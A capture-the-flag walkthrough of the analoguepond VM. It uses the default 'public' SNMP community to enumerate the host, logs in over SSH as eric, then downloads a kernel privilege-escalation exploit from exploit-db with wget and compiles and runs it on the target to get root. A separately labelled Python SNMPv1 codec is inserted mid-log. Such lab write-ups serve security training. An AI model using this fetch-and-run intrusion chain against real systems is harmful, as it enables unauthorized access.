It has been a while since I solved a CTF. I decided to try to crack the analoguepond VM from @knightmare2600.
First you need to put on an appropriate soundtrack for this VM.
Nmap, TCP SYN plus UDP in one run. The UDP sweep is slow (about 15 minutes here, with nmap backing off as probes get dropped), but it is what finds SNMP on 161/udp; a TCP-only scan would show nothing but SSH.

root@kali:~# nmap -sS -sU -T4 -A -v 192.168.1.14
Starting Nmap 7.60 ( https://nmap.org ) at 2017-08-20 13:37 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating ARP Ping Scan at 13:37
Scanning 192.168.1.14 [1 port]
Completed ARP Ping Scan at 13:37, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:37
Completed Parallel DNS resolution of 1 host. at 13:37, 0.01s elapsed
Initiating SYN Stealth Scan at 13:37
Scanning 192.168.1.14 [1000 ports]
Discovered open port 22/tcp on 192.168.1.14
Completed SYN Stealth Scan at 13:37, 1.26s elapsed (1000 total ports)
Initiating UDP Scan at 13:37
Scanning 192.168.1.14 [1000 ports]
Increasing send delay for 192.168.1.14 from 0 to 50 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 192.168.1.14 from 50 to 100 due to max_successful_tryno increase to 5
Increasing send delay for 192.168.1.14 from 100 to 200 due to max_successful_tryno increase to 6
Warning: 192.168.1.14 giving up on port because retransmission cap hit (6).
UDP Scan Timing: About 15.06% done; ETC: 13:41 (0:02:55 remaining)
Increasing send delay for 192.168.1.14 from 200 to 400 due to 16 out of 39 dropped probes since last increase.
UDP Scan Timing: About 19.39% done; ETC: 13:43 (0:04:14 remaining)
Increasing send delay for 192.168.1.14 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
UDP Scan Timing: About 22.36% done; ETC: 13:44 (0:05:16 remaining)
UDP Scan Timing: About 25.53% done; ETC: 13:45 (0:05:53 remaining)
UDP Scan Timing: About 28.50% done; ETC: 13:46 (0:06:19 remaining)
UDP Scan Timing: About 36.37% done; ETC: 13:48 (0:06:46 remaining)
UDP Scan Timing: About 47.17% done; ETC: 13:49 (0:06:14 remaining)
UDP Scan Timing: About 54.54% done; ETC: 13:50 (0:05:38 remaining)
UDP Scan Timing: About 60.99% done; ETC: 13:50 (0:05:00 remaining)
UDP Scan Timing: About 66.83% done; ETC: 13:51 (0:04:21 remaining)
UDP Scan Timing: About 72.66% done; ETC: 13:51 (0:03:39 remaining)
UDP Scan Timing: About 78.09% done; ETC: 13:51 (0:02:59 remaining)
UDP Scan Timing: About 83.40% done; ETC: 13:51 (0:02:17 remaining)
UDP Scan Timing: About 88.63% done; ETC: 13:51 (0:01:35 remaining)
UDP Scan Timing: About 93.84% done; ETC: 13:51 (0:00:52 remaining)
Discovered open port 161/udp on 192.168.1.14
Completed UDP Scan at 13:52, 904.80s elapsed (1000 total ports)
Initiating Service scan at 13:52
Scanning 93 services on 192.168.1.14
Service scan Timing: About 3.23% done; ETC: 14:29 (0:35:30 remaining)
Service scan Timing: About 35.48% done; ETC: 13:58 (0:03:49 remaining)
Service scan Timing: About 36.56% done; ETC: 14:00 (0:04:34 remaining)
Service scan Timing: About 68.82% done; ETC: 13:57 (0:01:34 remaining)
Service scan Timing: About 76.34% done; ETC: 13:58 (0:01:18 remaining)
Completed Service scan at 13:57, 262.62s elapsed (93 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.14
adjust_timeouts2: packet supposedly had rtt of -175682 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -175682 microseconds. Ignoring time.
NSE: Script scanning 192.168.1.14.
Initiating NSE at 13:57
Completed NSE at 13:57, 30.80s elapsed
Initiating NSE at 13:57
Completed NSE at 13:57, 4.77s elapsed
Nmap scan report for 192.168.1.14
Host is up (0.00045s latency).
Not shown: 1907 closed ports, 91 open|filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b8:83:a1:ee:76:be:b7:3f:b9:45:ad:b4:ba:47:8b:75 (DSA)
| 2048 19:98:89:e1:d4:4c:42:2b:ca:da:37:79:99:1b:c9:ab (RSA)
| 256 81:5d:1c:e1:2b:03:7d:e3:18:c3:bc:a0:cf:0b:f7:63 (ECDSA)
|_ 256 73:0b:c9:69:8a:1d:1b:63:a3:68:ab:f5:c6:a8:c0:1c (EdDSA)
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: f391e6401236975900000000
| snmpEngineBoots: 2
|_ snmpEngineTime: 27m55s
| snmp-sysdescr: Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
|_ System uptime: 27m55.15s (167515 timeticks)
MAC Address: 08:00:27:42:5B:7B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 0.017 days (since Sun Aug 20 13:33:50 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: analoguepond; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.1.14

NSE: Script Post-scanning.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1207.09 seconds
Raw packets sent: 3054 (107.708KB) | Rcvd: 2011 (98.207KB)

Two things to take from the report. The SNMP agent answers SNMPv1 with the default read-only community string public, so anyone on the network can read the MIB. And sysDescr already gives the exact kernel, 3.19.0-25-generic on Ubuntu 14.04, which is the version to search exploits for later.

Offensive Security's walkthrough of the Metasploit SNMP modules: https://www.offensive-security.com/metasploit-unleashed/snmp-scan/

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set rhost 192.168.1.14
[!] RHOST is not a valid option for this module. Did you mean RHOSTS?
rhost => 192.168.1.14
msf auxiliary(snmp_login) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf auxiliary(snmp_login) > set threads 10
threads => 10
msf auxiliary(snmp_login) > run
[+] 192.168.1.14:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf auxiliary(snmp_enum) > run
[+] 192.168.1.14, Connected.

[*] System information:

Host IP : 192.168.1.14
Hostname : analoguepond
Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
Contact : Eric Burdon <eric@example.com>
Location : There is a house in New Orleans they call it...
Uptime snmp : 01:29:23.40
Uptime system : 01:28:54.15
System date : 2017-8-23 01:20:44.0

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

...THE RISING SUN... Playing in the background: https://www.youtube.com/watch?v=5A-4VGfx5lU

Read-only SNMP access is all it takes here: sysContact hands over a username (eric) and sysLocation is the hint for the password. Guessing root's password over SSH goes nowhere, but eric's account works (the password typed is not shown).

root@kali:~# ssh root@192.168.1.14
Warning: Permanently added '192.168.1.14' (ECDSA) to the list of known hosts.
root@192.168.1.14's password:
Permission denied, please try again.
root@192.168.1.14's password:
Permission denied, please try again.
root@192.168.1.14's password:
root@kali:~# ssh eric@192.168.1.14
eric@192.168.1.14's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)

* Documentation: https://help.ubuntu.com/

System information as of Tue Aug 22 19:51:44 BST 2017

System load: 1.0 Memory usage: 2% Processes: 83
Usage of /: 82.3% of 5.39GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/

eric@analoguepond:~$ ls
reticulatingsplines.gif

The only thing in eric's home is a gif. Serve it from the target with Python's built-in web server and fetch it from Kali to have a look:

eric@analoguepond:~$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
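What snmp_login and snmp_enum are actually doing on the wire, as an added example that is not part of the original post and not Metasploit's code: a minimal SNMPv1 GetRequest/GetResponse codec in Python, hand-encoded in BER from RFC 1157 with no third-party library. It builds the same sysDescr.0 query the modules send with the community string public, validates and decodes a GetResponse, and includes a one-datagram UDP sender for a live target. The response it decodes offline is constructed here, with the sysDescr string copied from the scan output above; the request id 0x1337, the helper names and the error checks are my choices, not anything from the VM or from Metasploit.

```python
"""Minimal SNMPv1 (RFC 1157) GetRequest/GetResponse in hand-encoded BER.

Added example, not the VM author's code and not Metasploit's: it shows what a
community-string query looks like on the wire and why read-only 'public'
access alone leaks sysDescr/sysContact/sysLocation.
"""
import socket

SYSDESCR_OID = "1.3.6.1.2.1.1.1.0"    # sysDescr.0
SYSCONTACT_OID = "1.3.6.1.2.1.1.4.0"  # sysContact.0

# Constructed sample value, copied from the nmap / snmp_enum output above.
SAMPLE_SYSDESCR = ("Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu "
                   "SMP Fri Jul 24 21:16:20 UTC 2015 x86_64")


def _ber_len(n):
    """BER length: short form below 128, long form (0x80|N then N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body


def enc_int(v):
    # Two's complement, minimal length (a set sign bit forces a leading 0x00).
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))


def enc_str(s):
    return _tlv(0x04, s.encode() if isinstance(s, str) else s)


def enc_oid(dotted):
    parts = [int(p) for p in dotted.split(".")]
    out = bytearray([40 * parts[0] + parts[1]])  # first two arcs share one byte
    for p in parts[2:]:
        chunk = [p & 0x7F]                       # base-128, high bit = more follows
        p >>= 7
        while p:
            chunk.append(0x80 | (p & 0x7F))
            p >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def enc_seq(*items, tag=0x30):
    return _tlv(tag, b"".join(items))


def build_message(pdu_tag, community, oid, value, request_id):
    """pdu_tag 0xA0 = GetRequest-PDU, 0xA2 = GetResponse-PDU (context-specific)."""
    varbind = enc_seq(enc_oid(oid), value)
    pdu = enc_seq(enc_int(request_id), enc_int(0), enc_int(0),
                  enc_seq(varbind), tag=pdu_tag)
    return enc_seq(enc_int(0), enc_str(community), pdu)  # version 0 == SNMPv1


def build_get_request(community, oid, request_id=0x1337):
    return build_message(0xA0, community, oid, b"\x05\x00", request_id)  # NULL value


def build_get_response(community, oid, text, request_id):
    # Constructed for offline use; a real agent fills the same slot with the value.
    return build_message(0xA2, community, oid, enc_str(text), request_id)


def _read_len(buf, i):
    first = buf[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n


def dec_oid(body):
    parts, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(val)
            val = 0
    return ".".join(map(str, parts))


def decode(buf, i=0):
    """Return (tag, value, end). Constructed tags (bit 0x20) give a list of (tag, value)."""
    tag = buf[i]
    length, i = _read_len(buf, i + 1)
    body, end = buf[i:i + length], i + length
    if tag & 0x20:
        items, j = [], 0
        while j < len(body):
            t, v, j = decode(body, j)
            items.append((t, v))
        return tag, items, end
    if tag == 0x02:
        return tag, int.from_bytes(body, "big", signed=True), end
    if tag == 0x06:
        return tag, dec_oid(body), end
    return tag, bytes(body), end  # OCTET STRING, NULL (empty) or anything else, raw


def parse_response(packet, expected_id=None):
    """Validate a GetResponse and return {oid: value}; raise on protocol or agent errors."""
    tag, msg, _ = decode(packet)
    if tag != 0x30 or len(msg) != 3:
        raise ValueError("not an SNMP message")
    (_, version), (_, community), (pdu_tag, pdu) = msg
    if version != 0 or pdu_tag != 0xA2:
        raise ValueError("not an SNMPv1 GetResponse-PDU")
    (_, req_id), (_, err_status), (_, err_index), (_, varbinds) = pdu
    if expected_id is not None and req_id != expected_id:
        raise ValueError("request-id mismatch: stale or spoofed reply")
    if err_status:
        raise ValueError(f"agent error-status {err_status} at index {err_index}")
    return {oid: value for _, ((_, oid), (_, value)) in varbinds}


def snmp_get(host, community, oid, timeout=2.0):
    """Live query: one UDP datagram to port 161 (needs a reachable target)."""
    req = build_get_request(community, oid)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(req, (host, 161))
        data, _ = s.recvfrom(65535)
    return parse_response(data, expected_id=0x1337)


if __name__ == "__main__":
    print("GetRequest:", build_get_request("public", SYSDESCR_OID).hex())
    resp = build_get_response("public", SYSDESCR_OID, SAMPLE_SYSDESCR, 0x1337)
    print("Decoded   :", parse_response(resp, expected_id=0x1337))
```

Against the VM the live call would be snmp_get("192.168.1.14", "public", SYSCONTACT_OID); the request-id check matters because SNMPv1 has no authentication beyond the community string, so a reply is only trustworthy as far as its id matches the query you sent.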
192.168.1.122 - - [23/Aug/2017 01:33:36] "GET /reticulatingsplines.gif HTTP/1.1" 200 -

Cow joke lol.

Back to the kernel version from sysDescr. With the exact build known, exploit-db has a matching local privilege escalation, and the target conveniently has both outbound HTTPS and gcc, so it can be fetched and compiled in place: https://www.exploit-db.com/exploits/39166/

eric@analoguepond:~$ wget https://www.exploit-db.com/download/39166
--2017-08-23 01:54:15-- https://www.exploit-db.com/download/39166
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2789 (2.7K) [application/txt]
Saving to: '39166'
100%[======================================>] 2,789 --.-K/s in 0s
2017-08-23 01:54:15 (470 MB/s) - '39166' saved [2789/2789]
eric@analoguepond:~$ ls
39166 reticulatingsplines.gif
eric@analoguepond:~$ mv ./39166 ./39166.c
eric@analoguepond:~$ ls
39166.c reticulatingsplines.gif
eric@analoguepond:~$ gcc ./39166.c
eric@analoguepond:~$ ls
39166.c a.out reticulatingsplines.gif
eric@analoguepond:~$ ./a.out
root@analoguepond:~# id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)

Note the shell: the uid is 0 but the primary gid and the supplementary groups are still eric's. The exploit only raises the uid, which is all that is needed, and the libvirtd group membership is worth remembering for later.

root@analoguepond:/root# cat /root/flag.txt
C'Mon Man! Y'all didn't think this was the final flag so soon...? Did the bright lights and big city knock you out...? If you pull a stunt like this again, I'll send you back to Walker... This is obviously troll flah #1 So keep going.
root@analoguepond:/root# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:42:5b:7b
inet addr:192.168.1.14 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe42:5b7b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3213 errors:0 dropped:0 overruns:0 frame:0
TX packets:1469 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:273953 (273.9 KB) TX bytes:185237 (185.2 KB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:748 (748.0 B) TX bytes:748 (748.0 B)

virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:166 errors:0 dropped:0 overruns:0 frame:0
TX packets:149 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11122 (11.1 KB) TX bytes:17147 (17.1 KB)

virbr0 on 192.168.122.1/24 is the libvirt NAT bridge, which together with the libvirtd group membership means this VM is itself a KVM host. The target already has nmap installed, so a ping sweep of the bridge subnet is one command:

root@analoguepond:/root# nmap -sn 192.168.122.0/24
Starting Nmap 6.40 ( http://nmap.org ) at 2017-08-23 02:15 BST
Nmap scan report for puppet.example.com (192.168.122.2)
Host is up (0.00081s latency).
MAC Address: 52:54:00:5B:05:F7 (QEMU Virtual NIC)
Nmap scan report for barringsbank.example.com (192.168.122.3)
Host is up (0.00066s latency).
MAC Address: 52:54:00:6D:93:6A (QEMU Virtual NIC)
Nmap scan report for 192.168.122.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.12 seconds

Two nested guests with QEMU NICs, puppet.example.com and barringsbank.example.com, sitting behind NAT and reachable only through this box. Those are the next targets.
To be continued…